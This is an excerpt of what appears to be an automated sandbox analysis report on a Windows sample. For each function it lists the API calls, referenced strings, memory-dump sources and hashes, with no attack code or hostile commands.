                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ColorLongWindow
                                    • String ID:
                                    • API String ID: 259745315-0
                                    • Opcode ID: c3a97d0c74d25adbf9b32b3d0aa35863134563974d34c020795b16b1d51a2563
                                    • Instruction ID: 1d7b2d95b9b7ea8e14f1e1b6b75b056132589bf71112be61e1d6ab69ed8ff79d
                                    • Opcode Fuzzy Hash: c3a97d0c74d25adbf9b32b3d0aa35863134563974d34c020795b16b1d51a2563
                                    • Instruction Fuzzy Hash: 05419F31008144EFDB21AF28DC98BB97B66FB06331F144265FE65CA2E2C7718D42EB61
                                    Function 008EA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharLowerBuffW.USER32(?,?,0090F910), ref: 008EA90B
                                    • GetDriveTypeW.KERNEL32(00000061,009389A0,00000061), ref: 008EA9D5
                                    • _wcscpy.LIBCMT ref: 008EA9FF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: BuffCharDriveLowerType_wcscpy
                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                    • API String ID: 2820617543-1000479233
                                    • Opcode ID: 64094e400880f9f17a0885554c755d9d4cdc80ae4784b1bee65085a2bed263ed
                                    • Instruction ID: aebfb1f0e651c882fdc49741dbb6ba8ce9fb65afce4016880d673bb07762f0a9
                                    • Opcode Fuzzy Hash: 64094e400880f9f17a0885554c755d9d4cdc80ae4784b1bee65085a2bed263ed
                                    • Instruction Fuzzy Hash: 15517C311183519FC314EF19C892AAFBBA5FF86704F154829F4A6D72A2DB31A909CB53
                                    Function 00889837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __i64tow__itow__swprintf
                                    • String ID: %.15g$0x%p$False$True
                                    • API String ID: 421087845-2263619337
                                    • Opcode ID: c9958344da4f9e530ba4403aca38a20c425f3f4267ab50325c396aa68878f785
                                    • Instruction ID: e7874aafe9297661df683d2a0e84c9d1981163acf67b25b0a8f5c1e2100e0d28
                                    • Opcode Fuzzy Hash: c9958344da4f9e530ba4403aca38a20c425f3f4267ab50325c396aa68878f785
                                    • Instruction Fuzzy Hash: FB41D771500609AFEB34EF78DC46EB677E8FF46304F24447EE589D7292EA31A9418B11
                                    Function 00907152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 0090716A
                                    • CreateMenu.USER32 ref: 00907185
                                    • SetMenu.USER32(?,00000000), ref: 00907194
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00907221
                                    • IsMenu.USER32(?), ref: 00907237
                                    • CreatePopupMenu.USER32 ref: 00907241
                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0090726E
                                    • DrawMenuBar.USER32 ref: 00907276
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                    • String ID: 0$F
                                    • API String ID: 176399719-3044882817
                                    • Opcode ID: f4f0e2a64ea53c1db32448b5f0c139f06698e7d6e6edfa004ac9fc5ab05afc1e
                                    • Instruction ID: b38650001109e2a85aa62be1917b54977854e0eaf38468b42516d86b14389d3f
                                    • Opcode Fuzzy Hash: f4f0e2a64ea53c1db32448b5f0c139f06698e7d6e6edfa004ac9fc5ab05afc1e
                                    • Instruction Fuzzy Hash: B1416C75A15209EFDB20DFA8D844EAABBF9FF49320F140029F955973A1D731A910DF90
                                    Function 009074BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0090755E
                                    • CreateCompatibleDC.GDI32(00000000), ref: 00907565
                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00907578
                                    • SelectObject.GDI32(00000000,00000000), ref: 00907580
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0090758B
                                    • DeleteDC.GDI32(00000000), ref: 00907594
                                    • GetWindowLongW.USER32(?,000000EC), ref: 0090759E
                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 009075B2
                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 009075BE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                    • String ID: static
                                    • API String ID: 2559357485-2160076837
                                    • Opcode ID: 01a08c989179b61491e7325101d143529f81669610710c19fc6d310be5db34ef
                                    • Instruction ID: 9f4c3fc1dd0c89a95a781ce69817b404ea9e965a0259081a0a7dedd820c4447f
                                    • Opcode Fuzzy Hash: 01a08c989179b61491e7325101d143529f81669610710c19fc6d310be5db34ef
                                    • Instruction Fuzzy Hash: F6316A72518219AFDF219FA4DC09FEA7B6DFF09720F114224FA15A60E0C735E911EBA4
                                    Function 008A6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 008A6E3E
                                      • Part of subcall function 008A8B28: __getptd_noexit.LIBCMT ref: 008A8B28
                                    • __gmtime64_s.LIBCMT ref: 008A6ED7
                                    • __gmtime64_s.LIBCMT ref: 008A6F0D
                                    • __gmtime64_s.LIBCMT ref: 008A6F2A
                                    • __allrem.LIBCMT ref: 008A6F80
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A6F9C
                                    • __allrem.LIBCMT ref: 008A6FB3
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A6FD1
                                    • __allrem.LIBCMT ref: 008A6FE8
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A7006
                                    • __invoke_watson.LIBCMT ref: 008A7077
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                    • String ID:
                                    • API String ID: 384356119-0
                                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                    • Instruction ID: 6c1ecb5556fc9f7088ae5bee78f15442f18378e8ea2e24b94b07cc76c78310b7
                                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                    • Instruction Fuzzy Hash: 4771E776A00B16ABF714AE7CDC42B9AB7A4FF06724F244229F514D7A81F770D9208BD1
                                    Function 008E2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 008E2542
                                    • GetMenuItemInfoW.USER32(00945890,000000FF,00000000,00000030), ref: 008E25A3
                                    • SetMenuItemInfoW.USER32(00945890,00000004,00000000,00000030), ref: 008E25D9
                                    • Sleep.KERNEL32(000001F4), ref: 008E25EB
                                    • GetMenuItemCount.USER32(?), ref: 008E262F
                                    • GetMenuItemID.USER32(?,00000000), ref: 008E264B
                                    • GetMenuItemID.USER32(?,-00000001), ref: 008E2675
                                    • GetMenuItemID.USER32(?,?), ref: 008E26BA
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008E2700
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E2714
                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E2735
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                    • String ID:
                                    • API String ID: 4176008265-0
                                    • Opcode ID: 6d9fc1aeaf0f124ea4041fc10b6a0340576838983cf811158ef1af87159ce6d7
                                    • Instruction ID: 4217a2b5277b1e1a3eac63677fd659337dfea2ee6fe15a1e44c25a7774c21583
                                    • Opcode Fuzzy Hash: 6d9fc1aeaf0f124ea4041fc10b6a0340576838983cf811158ef1af87159ce6d7
                                    • Instruction Fuzzy Hash: 45619F70914289AFDB21CFA5CC94DBE7BBCFB02304F140169E842E7261D771AE05DB21
                                    Function 00906F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00906FA5
                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00906FA8
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00906FCC
                                    • _memset.LIBCMT ref: 00906FDD
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00906FEF
                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00907067
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$LongWindow_memset
                                    • String ID:
                                    • API String ID: 830647256-0
                                    • Opcode ID: 0d45ef372960736dbbe6970f7c5db4f8a919d60d863f0fabaa2decd192309bf9
                                    • Instruction ID: 842a4fe2d0c5ef0bf8ca471fd4dd480350d9c9abf8dae882e8361a4aa3511717
                                    • Opcode Fuzzy Hash: 0d45ef372960736dbbe6970f7c5db4f8a919d60d863f0fabaa2decd192309bf9
                                    • Instruction Fuzzy Hash: 35614975904208AFDB11DFA8CC81EEEB7B8EF09710F104159FA14EB2E2C775A951DBA0
                                    Function 008D6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 008D6BBF
                                    • SafeArrayAllocData.OLEAUT32(?), ref: 008D6C18
                                    • VariantInit.OLEAUT32(?), ref: 008D6C2A
                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 008D6C4A
                                    • VariantCopy.OLEAUT32(?,?), ref: 008D6C9D
                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 008D6CB1
                                    • VariantClear.OLEAUT32(?), ref: 008D6CC6
                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 008D6CD3
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008D6CDC
                                    • VariantClear.OLEAUT32(?), ref: 008D6CEE
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008D6CF9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                    • String ID:
                                    • API String ID: 2706829360-0
                                    • Opcode ID: 5de218236320982e62f01a088dc3aac0d37fd531c46f4a16d544ecb05350f612
                                    • Instruction ID: ae3beae9800358915fd01478fcf6fe68c6b5235cbf945517786ff963c36e2565
                                    • Opcode Fuzzy Hash: 5de218236320982e62f01a088dc3aac0d37fd531c46f4a16d544ecb05350f612
                                    • Instruction Fuzzy Hash: 33418231A1021D9FCF10DF68D8989AEBBB9FF08314F00816AE955E7361DB30AA45DF90
                                    Function 008F83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
                                      • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
                                    • CoInitialize.OLE32 ref: 008F8403
                                    • CoUninitialize.COMBASE ref: 008F840E
                                    • CoCreateInstance.COMBASE(?,00000000,00000017,00912BEC,?), ref: 008F846E
                                    • IIDFromString.COMBASE(?,?), ref: 008F84E1
                                    • VariantInit.OLEAUT32(?), ref: 008F857B
                                    • VariantClear.OLEAUT32(?), ref: 008F85DC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                    • API String ID: 834269672-1287834457
                                    • Opcode ID: 51d2075c1ee1a105833cc73da4876bb6ed4dd723b03c126589ce64c795822b5b
                                    • Instruction ID: be29f696820a07b2ba42db8be2096d186c6ad8a3ea67362501f45975f07dc5f4
                                    • Opcode Fuzzy Hash: 51d2075c1ee1a105833cc73da4876bb6ed4dd723b03c126589ce64c795822b5b
                                    • Instruction Fuzzy Hash: 19618B7060871ADFC710DF24C848A6AB7E8FF49758F044519FA86DB291CB70EE44CB92
                                    Function 008F5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WSAStartup.WS2_32(00000101,?), ref: 008F5793
                                    • inet_addr.WS2_32(?), ref: 008F57D8
                                    • gethostbyname.WS2_32(?), ref: 008F57E4
                                    • IcmpCreateFile.IPHLPAPI ref: 008F57F2
                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008F5862
                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 008F5878
                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008F58ED
                                    • WSACleanup.WS2_32 ref: 008F58F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                    • String ID: Ping
                                    • API String ID: 1028309954-2246546115
                                    • Opcode ID: 662d3a9e0b33a31c38dd7fbb4b2c45eb5d76e2e6eb05f7ef686450b655246109
                                    • Instruction ID: 6c3b2942bb506647fd56f0e722d62f419c7a268c6c5d1bb935ca58d668046056
                                    • Opcode Fuzzy Hash: 662d3a9e0b33a31c38dd7fbb4b2c45eb5d76e2e6eb05f7ef686450b655246109
                                    • Instruction Fuzzy Hash: 51518C31614604EFD720AF28DC45B3ABBE4FB48760F044529FA96DB2A1DB30E900DB42
                                    Function 008EB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 008EB4D0
                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 008EB546
                                    • GetLastError.KERNEL32 ref: 008EB550
                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 008EB5BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Error$Mode$DiskFreeLastSpace
                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                    • API String ID: 4194297153-14809454
                                    • Opcode ID: 1170203b5c0d86b8f76036566ec399a707194ec4b7561be067e1d8f55c8a7fbd
                                    • Instruction ID: 97fe9c6d1cf438ce9fad91af74cd70073c2f020e260e4308b7d0fa5c520e7dc8
                                    • Opcode Fuzzy Hash: 1170203b5c0d86b8f76036566ec399a707194ec4b7561be067e1d8f55c8a7fbd
                                    • Instruction Fuzzy Hash: 73318E35A00249EFCB10EB69D885ABFBBB4FF4A314F144126F515E7291DB709A42CB91
                                    Function 008D8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                      • Part of subcall function 008DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008DAABC
                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 008D9014
                                    • GetDlgCtrlID.USER32 ref: 008D901F
                                    • GetParent.USER32 ref: 008D903B
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 008D903E
                                    • GetDlgCtrlID.USER32(?), ref: 008D9047
                                    • GetParent.USER32(?), ref: 008D9063
                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 008D9066
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 1536045017-1403004172
                                    • Opcode ID: 1250f929fbc6cb04b719eb7d0b8048b3d201d2694184ea48e7f31b7fc871942a
                                    • Instruction ID: cda98fcb31732f5d05b53fdc8643dbd619d4666fe641fc92118e0726f9256694
                                    • Opcode Fuzzy Hash: 1250f929fbc6cb04b719eb7d0b8048b3d201d2694184ea48e7f31b7fc871942a
                                    • Instruction Fuzzy Hash: D621FF75A00108BFDF14ABA4CC95EFEBB74FF49310F10021AF961972A1DB368919EB21
                                    Function 008D907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                      • Part of subcall function 008DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008DAABC
                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008D90FD
                                    • GetDlgCtrlID.USER32 ref: 008D9108
                                    • GetParent.USER32 ref: 008D9124
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 008D9127
                                    • GetDlgCtrlID.USER32(?), ref: 008D9130
                                    • GetParent.USER32(?), ref: 008D914C
                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 008D914F
                                    Strings
                                    Memory Dump Source
